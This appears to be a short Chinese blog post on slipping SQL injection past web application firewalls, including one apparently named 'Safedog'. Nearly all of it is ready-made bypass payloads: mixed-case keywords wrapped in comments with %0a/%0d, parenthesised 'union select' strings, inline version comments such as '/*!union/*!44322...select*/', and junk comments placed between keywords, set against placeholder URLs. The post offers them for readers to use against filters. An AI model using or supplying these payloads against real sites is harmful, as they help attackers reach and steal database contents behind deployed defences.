绕WAF&安全狗新姿势

俗话说只要思路宽,绕狗绕的欢。前段时间我有尝试着用以下的方法绕狗,效果还不错。不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法。

 

举例-->整型注入 绕过WAF

绕过方法:

  •   就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1   可能会被过滤可改为  /*%0Aand%0a*/ 1=1  或  and 'a' in('a','b') 或  /*%0AaNd%0A*/ 1=1 
  •      Order by 7 可改为 group by 7 或group by (7)去绕过
  •      加括号去尝试         id=-1 union select 1,2,3 可改为    id=-1 union (((select (1),2,3)))

             加+ - ! @ 去尝试    id=-1 union select +或者@或者!或者- 1,2,3

             加%0a换行)            id=-1 union %0a select %0a 1,2,3

 

绕过安全狗:

  • And 可用 url编码%26表示
  • 加内联 和数字去绕过 如:http://www.xxx.com/union.php?id=-1 /*!union/*!44322/*!22322select*/ 1,2,3,4
  •   每个词前加它/*%!a*/ 就是干扰  如:http://www.xxx.com/union.php?id=-1 union/*%!a*/select/*%!a*/1,2,3,4

 

上一篇:sql注入进阶-绕开过滤


下一篇:我们常听到Kbps、Mbps、Gbps它们分别的含义?